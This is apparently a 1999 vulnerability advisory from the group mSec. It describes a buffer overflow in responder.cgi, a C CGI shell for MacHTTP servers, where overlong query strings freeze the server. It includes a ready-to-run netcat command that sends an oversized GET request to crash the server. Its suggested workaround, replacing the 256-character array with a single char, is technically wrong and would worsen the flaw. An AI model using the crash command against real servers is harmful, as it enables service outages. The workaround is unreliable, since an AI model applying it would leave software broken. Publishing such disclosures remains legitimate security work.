responder.cgi

             ___________________________
            /        /        /        /\
     ______/    ____/    ____/        / /
    /     /        /        /    ____/ /
   /     /____    /    ____/        / / 
  / / / /        /        /        / /
 /_/_/_/________/________/________/ /
 \_____\________\________\________\/
 / . ../Macintosh  Security/.. .  /
/________________________________/
Presents:

Responder.cgi Vulnerability
Written by Epic, A Member of mSec <epic@msec.net>
Released 4/9/99

Responder.cgi, a public domain 'C' shell for MacHTTP CGI Servers contains a buffer overflow that when exploited, will cause the server it is run on to freeze. You are at risk if your responder.cgi file contains the line of code:

char PostArg_Search[256];

which is the QUERY_STRING, Since it only allows upto 256 characters after ?, the server will crash if 257+ characters are requested.

Exploit Example: (nc is netcat from avian.org)
$ echo "GET /cgi-bin/responder.cgi?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" | nc machttp-server.com 80

Possible Workaround:
Remove responder.cgi from your /cgi-bin/ or change
char PostArg_Search[256]; to
char PostArg_Search;

Epic <epic@msec.net>
http://www.msec.net
hotline://msec.net